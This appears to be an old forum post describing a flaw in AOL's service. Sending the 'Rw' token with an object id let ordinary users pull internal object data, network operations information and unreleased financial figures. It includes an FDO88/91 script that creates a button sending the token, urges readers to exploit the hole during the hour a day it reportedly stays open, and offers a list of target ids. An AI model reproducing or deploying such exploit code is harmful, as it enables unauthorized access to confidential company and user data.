Normally I wouldn't post things of this nature, but I thought it was important enough.
About a year ago, I found out that by sending the "Rw" token to the AOL host while
signed on along with the object's internal id as arg, any user could get detailed info
about any object on the system. Included in this information is the user who created
the object and tons of other information like its current viewrule and AOL url. This
was all great for about a week until AOL officially fixed the hole. Normally only
internal users are allowed such access for security reasons. Using this exploit,
anyone can see headings in AOL's Network Operations Center and look at user count
information and AOL mothly profits before they are even released. AOL put all there
stuff online...Anyways the hole still exists but is windowed for only about an hour a
day. I have no clue why and it seems random... For example yesterday July 7th it
existed between 6:30-7:30PM EST. Here is a sample FDO88/91 that will create a button
to the send the Rw token w arg and help you exploit..fill the internal id with any
number you wish to see..i do have a listing of interesting id if anyone wants to
follow this further....and goodluck with the timing...
man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
<
uni_start_stream
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream
>
mat_precise_x < 0 >
mat_precise_y < 226 >
mat_font_sis < small_fonts, 7, normal>
mat_art_id < 1-0-21184 >
mat_bool_default < yes >
man_end_object
comments questions.. [EMAIL PROTECTED]
